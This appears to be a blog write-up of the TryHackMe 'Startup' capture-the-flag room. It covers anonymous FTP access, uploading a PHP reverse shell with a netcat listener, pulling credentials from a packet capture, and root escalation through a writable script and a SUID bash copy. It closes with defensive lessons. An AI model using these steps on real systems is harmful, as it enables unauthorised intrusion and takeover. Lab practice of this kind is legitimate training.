Challenges: Startup (TryHackMe)

Table of contents

Welcome to Spice Hut, a quirky startup that sells spices and sandwiches—but more importantly, has questionable security practices. As part of a penetration testing engagement, our goal was to assess their infrastructure and attempt full system compromise. From initial enumeration to gaining root access, this box tested a wide range of fundamental skills, including service enumeration, steganography, reverse shells, PCAP analysis, and privilege escalation via weak scripting logic.
This write-up summarizes the full exploit chain used during the engagement, the vulnerabilities discovered, and key lessons learned throughout the process.
Welcome to Spice Hut!
We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!
Answer the questions below
What is the secret spicy soup recipe?
nmap -sC -sV IP_Address
ftp IP_Address
Anonymousget notice.txt
get important.jpg
cat notice.txt
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus
sudo pip3 install capstone==4.0.2
binwalk -e important.jpg
the image sort of a meme
we’re going to copy a reverse shell php file the upload it to ftp then we’ll use to get initial user access
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
nano shell.php
edit the IP_Address and Port
log back to ftp then use this command:
ftp IP_Address
put shell.php
nc -lvnp 4444
go to the http://IP_Address/files/ftp/
and click on shell.php
file
the shell will be reversed:
switch to fully interactive TTY shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
we found a recipe.txt
file that reveals the recipe
What are the contents of user.txt?
back to ftp there’s an ftp folder that we had missed and checking the folder it has a pcapng file that will help us move on in this step
ftp IP_Address
get suspicious.pcapng
open the pcappng file using Wireshark
select one with TCP protocol and click on Analyze then select follow and TCP Stream then keep changing the streams, stream 7 and look through
we have a user called lennie and password, we can use ssh to access the user flag
ssh lennie@IP_Address
find / -type f -name user.txt 2> /dev/null
- What are the contents of root.txt?
cd scripts/
cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
ls -lah /etc/print.sh
/etc$ chmod +x print.sh
/$ /tmp/rootbash -p
# find / -type f -name root.txt 2> /dev/null
Credits
Spice Hut was very happy with your results and it is guaranteed they will spread word about your excellence with their partners. Astounding work!
Find my official writeup here: https://www.youtube.com/watch?v=3qNxI1OggGc
I'd like to thank ku5e for being a good sensei and GeneralClaw, my grammar cop.
I'd like to thank my testers Amit25095, BarZigmon and powershot.
Additionally, I'd love to thank TryHackMe not just for their platform, of which has changed my life, but for giving me this opportunity to give back to the community.
And of course, I'd like to thank you for playing. Hope to see you soon!
This box was an excellent showcase of practical penetration testing skills. From basic enumeration and file analysis to privilege escalation via insecure script execution, Spice Hut reinforces the importance of:
Disabling anonymous FTP access in production environments.
Avoiding hardcoded or plaintext credentials.
Reviewing file and directory permissions, especially scripts run by privileged users.
Analyzing network captures for leaked sensitive information.
While the memes and quirky dialogue made the journey fun, the security flaws were very real—and could easily be exploited in a real-world scenario. Spice Hut has since taken your advice seriously, and with your help, they’ve now hired a proper security team. 🍜
Subscribe to my newsletter
Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

Jebitok
Jebitok
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.